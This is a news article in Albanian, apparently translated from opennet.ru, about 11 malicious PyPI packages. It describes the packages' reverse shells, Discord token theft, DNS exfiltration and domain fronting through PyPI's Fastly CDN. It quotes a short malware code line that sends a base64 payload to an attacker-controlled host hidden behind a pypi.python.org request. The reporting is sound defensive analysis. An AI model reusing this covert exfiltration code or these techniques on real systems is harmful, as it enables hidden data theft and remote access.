Në katalogun PyPI janë identifikuar biblioteka malinj që përdorin CDN PyPI për të fshehur kanalet e komunikimit

Në katalogun PyPI (Python Package Index) janë identifikuar 11 paketa që përmbajnë kod të dëmshëm. Para se të identifikoheshin problemet, paketat kishin ngarkuar rreth 38 mijë herë. Paketat e identifikuara si të dëmshme janë të njohura për përdorimin e mënyrave të sofistikuara për të fshehur kanalet e komunikimit me serverët e sulmuesve.

  • importantpackage (6305 shkarkime), important-package (12897) — vendosnin lidhje me njĂ« server tĂ« jashtĂ«m nĂ«n paraprakitet e njĂ« lidhjeje me pypi.python.org pĂ«r tĂ« ofruar qasje nĂ« sistem (reverse shell) dhe pĂ«rdornin programin trevorc2 pĂ«r tĂ« fshehur kanalin e komunikimit.
  • pptest (10001), ipboards (946) — pĂ«rdornin DNS si kanal komunikimi pĂ«r tĂ« transmetuar informacion rreth sistemit (nĂ« paketĂ«n e parĂ«, emri i hostit, katalogu i punĂ«s, IP e brendshme dhe e jashtme, nĂ« paketa tĂ« dytĂ« — emri i pĂ«rdoruesit dhe i hostit).
  • owlmoon (3285), DiscordSafety (557), yiffparty (1859) — identifikonin nĂ« sistem tokenin e shĂ«rbimit Discord dhe e dĂ«rgonin atĂ« nĂ« njĂ« host tĂ« jashtĂ«m.
  • trrfab (287) — dĂ«rgonte nĂ« njĂ« host tĂ« jashtĂ«m identifikuesin, emrin e hostit dhe pĂ«rmbajtjen e /etc/passwd, /etc/hosts, /home.
  • 10Cent10 (490) — krijonte njĂ« lidhje backwards shell me njĂ« host tĂ« jashtĂ«m.
  • yandex-yt (4183) — dĂ«rgoi njĂ« mesazh pĂ«r komprometimin e sistemit dhe redirektoi nĂ« njĂ« faqe me informacion shtesĂ« pĂ«r veprimet e mĂ«tejshme, tĂ« dhĂ«na nga nda.ya.ru (api.ya.cc).

Vlen të kushtohet vëmendje metodës së lidhjes me hoste të jashtme, e përdorur në paketat importantpackage dhe important-package, të cilat fshehën aktivitetin e tyre në rrjetin e shpërndarjes së përmbajtjes Fastly, e cila përdoret në katalogun PyPI. Në fakt, kërkesat dërgoheshin në serverin pypi.python.org (duke përfshirë emrin python.org në SNI brenda kërkesës HTTPS), por në të njëjtën kohë, emri i serverit të kontrolluar nga sulmuesit (sec.forward.io.global.prod.fastly.net) ishte vendosur në titullin HTTP "Host". Rrjeti i shpërndarjes së përmbajtjes e dërgoi një kërkesë të tillë në serverin e sulmuesve, duke përdorur parametrat e lidhjes TLS me pypi.python.org.

Funksionaliteti i infrastrukturës PyPI sigurohet me anë të rrjetit të shpërndarjes së përmbajtjes Fastly, ku për të ruajtur kërkesat standarde përdoret një proxy i qartë Varnish, dhe gjithashtu aplikohet përpunimi i certifikatave TLS në nivelin e CDN-së, dhe jo në serverët përfundimtarë, për organizimin e kalimit të kërkesave HTTPS përmes proxy-t. Pavarësisht nga hosti i synuar, kërkesat dërgohen në proxy, i cili përcakton hostin e nevojshëm nëpërmjet heading-ut HTTP "Host", dhe emrat e domain-eve hostet lidhen me adresat IP standarde për të gjithë klientët e Fastly të balancuesve të ngarkesës të CDN-së.

Serveri i sulmuesve gjithashtu regjistrohet në CDN Fastly, e cila ofron plane tarifore falas për të gjithë ata që janë të interesuar dhe madje lejon regjistrimin anonim. Rëndësi të veçantë ka se për të dërguar kërkesat ndaj viktimës në krijimin e "reverse shell" përdoret gjithashtu skema, por e iniciuar nga ana e hostit të sulmuesve. Nga ana tjetër, ndërveprimi me serverin e sulmuesve duket si një seancë legjitime me katalogun PyPI, e cila është e enkriptuar duke përdorur certifikatës TLS PyPI. Një teknikë e tillë, e njohur si «domain fronting», është përdorur më parë aktivisht për të fshehur emrin e hostit gjatë anashkalimit të bllokimeve, duke shfrytëzuar mundësinë e ofruar në disa rrjete CDN për të kryer kërkesat përmes HTTPS me shënimin në SNI të një hosti të rremë dhe me kalimin e emrit të kërkuar të hostit në headerin HTTP Host brenda seancës TLS.

Në katalogun PyPI janë identifikuar biblioteka malinj që përdorin CDN PyPI për të fshehur kanalet e komunikimit

PĂ«r tĂ« fshehur aktivitetin inovativ, Ă«shtĂ« pĂ«rdorur gjithashtu paketa TrevorC2, e cila lejon tĂ« bĂ«het interaksioni me serverin tĂ« duket si navigim normal nĂ« web; p.sh., kĂ«rkesat e dĂ«mshme dĂ«rgoheshin si shkarkime imazhesh «https://pypi.python.org/images/guid=» me kodimin e informacionit nĂ« parametrin guid. url = «https://pypi.python.org» + «/images» + «?» + «guid=» + b64_payload r = request.Request(url, headers = {‘Host’: «psec.forward.io.global.prod.fastly.net»})

Në paketat pptest dhe ipboards është aplikuar një qasje tjetër për të fshehur aktivitetin rrjetik, e bazuar në kodimin e informacionit të dobishëm në kërkesat për serverin DNS. Malware-i transmeton informacionin duke kryer kërkesa DNS të tipit "nu4timjagq4fimbuhe.example.com", në të cilat janë koduar të dhënat që dërgohen te serveri i komandës nëpërmjet formatit base64 në emrin e subdomenit. Sulmuesi pranon të dhënat e mesazheve duke kontrolluar serverin DNS për domenin example.com.

Burimi: opennet.ru

Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Bleni hostim tĂ« besueshĂ«m pĂ«r faqe me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster